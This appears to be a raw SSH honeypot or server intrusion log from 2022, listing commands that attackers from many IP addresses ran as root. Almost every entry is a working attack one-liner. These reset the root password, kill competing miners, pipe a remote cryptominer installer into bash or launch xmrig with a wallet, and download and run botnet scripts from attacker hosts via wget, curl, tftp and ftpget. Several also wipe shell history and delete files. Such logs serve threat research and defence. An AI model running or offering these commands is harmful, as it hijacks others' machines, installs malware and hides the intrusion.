25-Aug-2022 15:59:35 ssh2 root Exec uname -a; nvidia-smi; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1 uname -a nvidia-smi curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1 From 179.43.156.144 27-Aug-2022 09:56:57 ssh2 root Exec echo root:ds234e31s123tij24jtiu3ji4rg|chpasswd|bash; uname -a; pkill a; pkill xmrig; pkill cnrig; pkill xmrRIG; pkill xmr; pkill x86; pkill x86_64; pkill Opera; nvidia-smi; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1; echo 1 > /root/.bash_history; history -c; wget http://179.43.154.138/lanscancrypt; curl -O http://179.43.154.138/lanscancrypt; chmod 777 lanscancrypt; ./lanscancrypt echo root:ds234e31s123tij24jtiu3ji4rg|chpasswd|bash uname -a pkill a pkill xmrig pkill cnrig pkill xmrRIG pkill xmr pkill x86 pkill x86_64 pkill Opera nvidia-smi curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1 echo 1 > /root/.bash_history history -c wget http://179.43.154.138/lanscancrypt curl -O http://179.43.154.138/lanscancrypt chmod 777 lanscancrypt ./lanscancrypt From 109.205.213.14 27-Aug-2022 11:31:07 ssh2 root Exec yum install wget -y; apt install wget -y; sudo apt wget -y; sudo apt-get -y purge wget; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://109.206.241.17/Beastmode.sh; curl -O http://109.206.241.17/Beastmode.sh; chmod 777 Beastmode.sh; sh Beastmode.sh; tftp 109.206.241.17 -c get Beastmode.sh; chmod 777 Beastmode.sh; sh Beastmode.sh; tftp -r Beastmode2.sh -g 109.206.241.17; chmod 777 Beastmode2.sh; sh Beastmode2.sh; ftpget -v -u anonymous -p anonymous -P 21 109.206.241.17 Beastmode1.sh Beastmode1.sh; sh Beastmode1.sh; rm -rf Beastmode.sh Beastmode.sh Beastmode2.sh Beastmode1.sh; rm -rf * yum install wget -y apt install wget -y sudo apt wget -y sudo apt-get -y purge wget cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://109.206.241.17/Beastmode.sh curl -O http://109.206.241.17/Beastmode.sh chmod 777 Beastmode.sh sh Beastmode.sh tftp 109.206.241.17 -c get Beastmode.sh chmod 777 Beastmode.sh sh Beastmode.sh tftp -r Beastmode2.sh -g 109.206.241.17 chmod 777 Beastmode2.sh sh Beastmode2.sh ftpget -v -u anonymous -p anonymous -P 21 109.206.241.17 Beastmode1.sh Beastmode1.sh sh Beastmode1.sh rm -rf Beastmode.sh Beastmode.sh Beastmode2.sh Beastmode1.sh rm -rf * From 95.214.24.192 27-Aug-2022 12:54:02 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://109.206.241.17/Beastmode.sh; curl -O http://109.206.241.17/Beastmode.sh; chmod 777 Beastmode.sh; sh Beastmode.sh; tftp 109.206.241.17 -c get Beastmode.sh; chmod 777 Beastmode.sh; sh Beastmode.sh; tftp -r Beastmode2.sh -g 109.206.241.17; chmod 777 Beastmode2.sh; sh Beastmode2.sh; ftpget -v -u anonymous -p anonymous -P 21 109.206.241.17 Beastmode1.sh Beastmode1.sh; sh Beastmode1.sh; rm -rf Beastmode.sh Beastmode.sh Beastmode2.sh Beastmode1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://109.206.241.17/Beastmode.sh curl -O http://109.206.241.17/Beastmode.sh chmod 777 Beastmode.sh sh Beastmode.sh tftp 109.206.241.17 -c get Beastmode.sh chmod 777 Beastmode.sh sh Beastmode.sh tftp -r Beastmode2.sh -g 109.206.241.17 chmod 777 Beastmode2.sh sh Beastmode2.sh ftpget -v -u anonymous -p anonymous -P 21 109.206.241.17 Beastmode1.sh Beastmode1.sh sh Beastmode1.sh rm -rf Beastmode.sh Beastmode.sh Beastmode2.sh Beastmode1.sh rm -rf * From 179.43.162.13 28-Aug-2022 02:51:11 ssh2 root Exec echo root:ds234e31s1221224jtiu3ji3rg|chpasswd|bash; uname -a; pkill a; pkill xmrig; pkill xmra64; pkill xmrig64; pkill cnrig; pkill xmrRIG; pkill xmr; pkill x86; pkill x86_64; pkill Opera; nvidia-smi; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1; echo 1 > /root/.bash_history; history -c; wget http://179.43.154.138/lanscancrypt; curl -O http://179.43.154.138/lanscancrypt; chmod 777 lanscancrypt; ./lanscancrypt echo root:ds234e31s1221224jtiu3ji3rg|chpasswd|bash uname -a pkill a pkill xmrig pkill xmra64 pkill xmrig64 pkill cnrig pkill xmrRIG pkill xmr pkill x86 pkill x86_64 pkill Opera nvidia-smi curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1 echo 1 > /root/.bash_history history -c wget http://179.43.154.138/lanscancrypt curl -O http://179.43.154.138/lanscancrypt chmod 777 lanscancrypt ./lanscancrypt From 179.43.162.13 29-Aug-2022 17:29:38 ssh2 root Exec echo root:ds234e31s1221224jtiu3ji3rg|chpasswd|bash; uname -a; pkill a; pkill xmrig; pkill xmra64; pkill xmrig64; pkill cnrig; pkill xmrRIG; pkill xmr; pkill x86; pkill x86_64; pkill Opera; nvidia-smi; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1 echo root:ds234e31s1221224jtiu3ji3rg|chpasswd|bash uname -a pkill a pkill xmrig pkill xmra64 pkill xmrig64 pkill cnrig pkill xmrRIG pkill xmr pkill x86 pkill x86_64 pkill Opera nvidia-smi curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1 From 163.123.143.164 30-Aug-2022 21:41:37 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://208.67.106.145/bins.sh; chmod 777 bins.sh; sh bins.sh;rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://208.67.106.145/bins.sh chmod 777 bins.sh sh bins.sh rm -rf * From 179.43.156.144 31-Aug-2022 20:04:22 ssh2 root Exec echo root:ds234e31s223tij24jtiu3ji1rg|chpasswd|bash; uname -a; pkill a; pkill xmrig; pkill cnrig; pkill xmrRIG; pkill xmr; pkill x86; pkill x86_64; pkill Opera; nvidia-smi; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1 echo root:ds234e31s223tij24jtiu3ji1rg|chpasswd|bash uname -a pkill a pkill xmrig pkill cnrig pkill xmrRIG pkill xmr pkill x86 pkill x86_64 pkill Opera nvidia-smi curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1 From 34.133.31.41 1-Sep-2022 07:23:10 ssh2 root Exec cd /tmp; rm -rf ssh.sh; wget http://217.114.43.19/ssh.sh; curl -O http://217.114.43.19/ssh.sh; chmod 777 ssh.sh; sh ssh.sh cd /tmp rm -rf ssh.sh wget http://217.114.43.19/ssh.sh curl -O http://217.114.43.19/ssh.sh chmod 777 ssh.sh sh ssh.sh From 35.230.116.36 1-Sep-2022 13:34:47 ssh2 root Exec cd /tmp; rm -rf ssh.sh; wget http://208.67.104.31/ssh.sh; curl -O http://208.67.104.31/ssh.sh; chmod 777 ssh.sh; sh ssh.sh cd /tmp rm -rf ssh.sh wget http://208.67.104.31/ssh.sh curl -O http://208.67.104.31/ssh.sh chmod 777 ssh.sh sh ssh.sh From 209.141.62.71 1-Sep-2022 21:10:52 ssh2 root Exec nproc; uname -a nproc uname -a From 103.9.36.251 2-Sep-2022 17:40:46 ssh2 root Exec uname -a ; lscpu uname -a lscpu From 103.9.36.251 2-Sep-2022 17:40:47 ssh2 root Exec uname -a ; lscpu uname -a lscpu Exec uname -a ; lscpu uname -a lscpu From 208.67.106.145 6-Sep-2022 19:46:09 ssh2 root Exec wget http://cnc.cyberproperty.us/bins.sh; chmod 777 bins.sh; sh bins.sh;rm -rf * wget http://cnc.cyberproperty.us/bins.sh chmod 777 bins.sh sh bins.sh rm -rf * From 119.84.8.9 7-Sep-2022 02:15:45 ssh2 root Exec uname uname From 179.43.162.13 8-Sep-2022 07:46:33 ssh2 root Exec echo root:ds234e31s1221224jtiu3ji3rg|chpasswd|bash; uname -a; pkill a; pkill xmrig; pkill xmra64; pkill xmrig64; pkill cnrig; pkill xmrRIG; pkill xmr; pkill x86; pkill x86_64; pkill Opera; nvidia-smi; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1 echo root:ds234e31s1221224jtiu3ji3rg|chpasswd|bash uname -a pkill a pkill xmrig pkill xmra64 pkill xmrig64 pkill cnrig pkill xmrRIG pkill xmr pkill x86 pkill x86_64 pkill Opera nvidia-smi curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1 From 179.43.156.144 10-Sep-2022 19:29:54 ssh2 root Exec echo root:ds234e31s223tij24jtiu3ji1rg|chpasswd|bash; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1; nvidia-smi echo root:ds234e31s223tij24jtiu3ji1rg|chpasswd|bash curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1 nvidia-smi From 222.71.55.180 11-Sep-2022 06:44:20 ssh2 root Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://39.165.53.17:8088/iposzz/dred -o /tmp/dred;perl /tmp/dred uname -a lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://39.165.53.17:8088/iposzz/dred -o /tmp/dred perl /tmp/dred Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://39.165.53.17:8088/iposzz/dred -o /tmp/dred;perl /tmp/dred uname -a lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://39.165.53.17:8088/iposzz/dred -o /tmp/dred perl /tmp/dred From 42.193.175.102 11-Sep-2022 15:28:17 ssh2 root Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://39.165.53.17:8088/iposzz/dred -o /tmp/dred;perl /tmp/dred uname -a lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://39.165.53.17:8088/iposzz/dred -o /tmp/dred perl /tmp/dred From 179.43.142.130 11-Sep-2022 16:41:22 ssh2 root Exec uname -a; uname -sr; uname -r; cat /config/cgminer.conf; hostname uname -a uname -sr uname -r cat /config/cgminer.conf hostname From 179.43.156.143 14-Sep-2022 10:16:37 ssh2 root Exec echo root:ds234e31s123tij24jtiu3jisrg|chpasswd|bash; uname -a; pkill xmrig; pkill cnrig; pkill x86; pkill x86_64; pkill Opera; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1; nvidia-smi echo root:ds234e31s123tij24jtiu3jisrg|chpasswd|bash uname -a pkill xmrig pkill cnrig pkill x86 pkill x86_64 pkill Opera curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1 nvidia-smi From 179.43.145.74 14-Sep-2022 10:22:10 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.182.129.239/Fourloko.sh; chmod 777 *; sh Fourloko.sh; tftp -g 107.182.129.239 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://107.182.129.239/Fourloko.sh chmod 777 * sh Fourloko.sh tftp -g 107.182.129.239 -r tftp1.sh chmod 777 * sh tftp1.sh rm -rf *.sh history -c From 179.43.162.13 14-Sep-2022 11:45:32 ssh2 root Exec echo root:d9s2349e319s12212246jti6u3j6i3r3|chpasswd|bash; uname -a; pkill a; pkill xmrig; pkill xmra64; pkill xmrig64; pkill cnrig; pkill xmrRIG; pkill xmr; pkill x86; pkill x86_64; pkill Opera; nvidia-smi; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1 echo root:d9s2349e319s12212246jti6u3j6i3r3|chpasswd|bash uname -a pkill a pkill xmrig pkill xmra64 pkill xmrig64 pkill cnrig pkill xmrRIG pkill xmr pkill x86 pkill x86_64 pkill Opera nvidia-smi curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1 From 80.76.51.46 15-Sep-2022 19:15:33 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.23.109.212/doge.sh; chmod 777 doge.sh; sh doge.sh; tftp 46.23.109.212 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 46.23.109.212; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 46.23.109.212 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf doge.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://46.23.109.212/doge.sh chmod 777 doge.sh sh doge.sh tftp 46.23.109.212 -c get tftp1.sh chmod 777 tftp1.sh sh tftp1.sh tftp -r tftp2.sh -g 46.23.109.212 chmod 777 tftp2.sh sh tftp2.sh ftpget -v -u anonymous -p anonymous -P 21 46.23.109.212 ftp1.sh ftp1.sh sh ftp1.sh rm -rf doge.sh tftp1.sh tftp2.sh ftp1.sh rm -rf * From 120.53.240.51 16-Sep-2022 09:09:27 ssh2 root Exec echo -n tf6pqfcd|md5sum;uname -a echo -n tf6pqfcd|md5sum uname -a From 141.98.10.88 17-Sep-2022 22:28:48 ssh2 root Exec echo root:2313374any1|chpasswd|bash; lspci | grep VGA || lspci | grep 3D; nvidia-smi; cat/etc/issue; uname -a; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1 echo root:2313374any1|chpasswd|bash lspci | grep VGA || lspci | grep 3D nvidia-smi cat/etc/issue uname -a curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1 From 179.43.156.144 20-Sep-2022 08:10:49 ssh2 root Exec echo root:ds234e31s223tij24j4h777ji1rg|chpasswd|bash; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1; nvidia-smi echo root:ds234e31s223tij24j4h777ji1rg|chpasswd|bash curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1 nvidia-smi From 34.75.255.185 24-Sep-2022 13:20:51 ssh2 root Exec cd /tmp; rm -rf xmr*; wget https://github.com/xmrig/xmrig/releases/download/v6.18.0/xmrig-6.18.0-linux-x64.tar.gz && tar -xvf xmrig-6.18.0-linux-x64.tar.gz && cd xmrig-6.18.0 && screen ./xmrig -o stratum+tcp://randomxmonero.usa-east.nicehash.com:3380 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.8 -k --nicehash --coin monero -a rx/0; ./xmrig -o stratum+tcp://randomxmonero.usa-east.nicehash.com:3380 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.8 -k --nicehash --coin monero -a rx/0 cd /tmp rm -rf xmr* wget https://github.com/xmrig/xmrig/releases/download/v6.18.0/xmrig-6.18.0-linux-x64.tar.gz tar -xvf xmrig-6.18.0-linux-x64.tar.gz cd xmrig-6.18.0 screen ./xmrig -o stratum+tcp://randomxmonero.usa-east.nicehash.com:3380 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.8 -k --nicehash --coin monero -a rx/0 ./xmrig -o stratum+tcp://randomxmonero.usa-east.nicehash.com:3380 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.8 -k --nicehash --coin monero -a rx/0 From 178.138.96.231 24-Sep-2022 14:39:26 ssh2 root w lscpu wow mmm suck nice processor From 179.43.156.143 25-Sep-2022 13:01:33 ssh2 root Exec echo root:ds234e31s123tij24jtiu23ji3rg|chpasswd|bash; uname -a; pkill xmrig; pkill cnrig; pkill x86; pkill x86_64; pkill Opera; nvidia-smi; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1 echo root:ds234e31s123tij24jtiu23ji3rg|chpasswd|bash uname -a pkill xmrig pkill cnrig pkill x86 pkill x86_64 pkill Opera nvidia-smi curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1 From 141.98.10.88 25-Sep-2022 18:52:34 ssh2 root Exec echo root:23jh133742any1|chpasswd|bash; lspci | grep VGA || lspci | grep 3D; nvidia-smi; cat/etc/issue; uname -a; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1 echo root:23jh133742any1|chpasswd|bash lspci | grep VGA || lspci | grep 3D nvidia-smi cat/etc/issue uname -a curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1 From 34.148.138.119 25-Sep-2022 22:05:33 ssh2 root Exec cd /tmp; rm -rf xmr*; pkill xmrig*; wget https://github.com/xmrig/xmrig/releases/download/v6.18.0/xmrig-6.18.0-linux-x64.tar.gz && tar -xvf xmrig-6.18.0-linux-x64.tar.gz && cd xmrig-6.18.0 && screen ./xmrig -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.$RANDOM -p x -k --nicehash --coin monero -a rx/0; ./xmrig -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.$RANDOM -p x -k --nicehash --coin monero -a rx/0 cd /tmp rm -rf xmr* pkill xmrig* wget https://github.com/xmrig/xmrig/releases/download/v6.18.0/xmrig-6.18.0-linux-x64.tar.gz tar -xvf xmrig-6.18.0-linux-x64.tar.gz cd xmrig-6.18.0 screen ./xmrig -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.$RANDOM -p x -k --nicehash --coin monero -a rx/0 ./xmrig -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.$RANDOM -p x -k --nicehash --coin monero -a rx/0 From 101.34.25.110 25-Sep-2022 23:27:24 ssh2 root Exec echo -e "\x6F\x6B" echo -e "\x6F\x6B" Exec cd /tmp; rm -rf xmr*; pkill xmrig*; wget https://github.com/xmrig/xmrig/releases/download/v6.18.0/xmrig-6.18.0-linux-x64.tar.gz && tar -xvf xmrig-6.18.0-linux-x64.tar.gz && cd xmrig-6.18.0 && screen ./xmrig -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.uwu -p x -k --nicehash --coin monero -a rx/0; ./xmrig -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.uwu -p x -k --nicehash --coin monero -a rx/0 cd /tmp rm -rf xmr* pkill xmrig* wget https://github.com/xmrig/xmrig/releases/download/v6.18.0/xmrig-6.18.0-linux-x64.tar.gz tar -xvf xmrig-6.18.0-linux-x64.tar.gz cd xmrig-6.18.0 screen ./xmrig -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.uwu -p x -k --nicehash --coin monero -a rx/0 ./xmrig -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.uwu -p x -k --nicehash --coin monero -a rx/0 From 37.116.206.113 26-Sep-2022 01:11:19 ssh2 root Exec /ip cloud print /ip cloud print From 101.34.25.110 26-Sep-2022 02:24:56 ssh2 root Exec echo -e "\x6F\x6B" echo -e "\x6F\x6B" Exec cd /tmp; rm -rf xmr*; wget https://github.com/xmrig/xmrig/releases/download/v6.18.0/xmrig-6.18.0-linux-x64.tar.gz && tar -xvf xmrig-6.18.0-linux-x64.tar.gz && cd xmrig-6.18.0 && sudo su; ./xmrig -o stratum+tcp://randomxmonero.usa-east.nicehash.com:3380 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J -k --nicehash --coin monero -a rx/0 cd /tmp rm -rf xmr* wget https://github.com/xmrig/xmrig/releases/download/v6.18.0/xmrig-6.18.0-linux-x64.tar.gz tar -xvf xmrig-6.18.0-linux-x64.tar.gz cd xmrig-6.18.0 sudo su ./xmrig -o stratum+tcp://randomxmonero.usa-east.nicehash.com:3380 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J -k --nicehash --coin monero -a rx/0 From 101.34.25.110 26-Sep-2022 02:50:10 ssh2 root Exec echo -e "\x6F\x6B" echo -e "\x6F\x6B" Exec cd /tmp; rm -rf xmr*; pkill xmrig*; wget https://github.com/xmrig/xmrig/releases/download/v6.18.0/xmrig-6.18.0-linux-x64.tar.gz && tar -xvf xmrig-6.18.0-linux-x64.tar.gz && cd xmrig-6.18.0 && screen ./xmrig -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.$RANDOM -p x -k --nicehash --coin monero -a rx/0; ./xmrig -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.$RANDOM -p x -k --nicehash --coin monero -a rx/0 cd /tmp rm -rf xmr* pkill xmrig* wget https://github.com/xmrig/xmrig/releases/download/v6.18.0/xmrig-6.18.0-linux-x64.tar.gz tar -xvf xmrig-6.18.0-linux-x64.tar.gz cd xmrig-6.18.0 screen ./xmrig -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.$RANDOM -p x -k --nicehash --coin monero -a rx/0 ./xmrig -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.$RANDOM -p x -k --nicehash --coin monero -a rx/0 From 115.49.33.138 26-Sep-2022 11:22:11 ssh2 root Exec echo -e "\x6F\x6B" echo -e "\x6F\x6B" From 141.98.10.88 26-Sep-2022 14:05:40 ssh2 root Exec echo root:23jh1337422a1ny1234|chpasswd|bash; lspci | grep VGA || lspci | grep 3D; nvidia-smi; cat/etc/issue; uname -a; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1 echo root:23jh1337422a1ny1234|chpasswd|bash lspci | grep VGA || lspci | grep 3D nvidia-smi cat/etc/issue uname -a curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1 From 185.196.220.32 5-Oct-2022 03:03:26 ssh2 root Exec cd /tmp; wget http://179.43.175.5/ssh.sh; chmod 777 ssh.sh; sh ssh.sh; curl http://179.43.175.5/sshc.sh -o sshc.sh; chmod 777 sshc.sh; sh sshc.sh; rm -rf *; cd /tmp wget http://179.43.175.5/ssh.sh chmod 777 ssh.sh sh ssh.sh curl http://179.43.175.5/sshc.sh -o sshc.sh chmod 777 sshc.sh sh sshc.sh rm -rf * From 34.141.5.23 5-Oct-2022 16:47:41 ssh2 root Exec cd /tmp; rm -rf xmr*; pkill xmrig*; wget https://github.com/xmrig/xmrig/releases/download/v6.18.0/xmrig-6.18.0-linux-x64.tar.gz && tar -xvf xmrig-6.18.0-linux-x64.tar.gz && cd xmrig-6.18.0 && screen ./xmrig -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.c4c$RANDOM -p x -k --nicehash --coin monero -a rx/0; ./xmrig -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.c4c$RANDOM -p x -k --nicehash --coin monero -a rx/0 cd /tmp rm -rf xmr* pkill xmrig* wget https://github.com/xmrig/xmrig/releases/download/v6.18.0/xmrig-6.18.0-linux-x64.tar.gz tar -xvf xmrig-6.18.0-linux-x64.tar.gz cd xmrig-6.18.0 screen ./xmrig -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 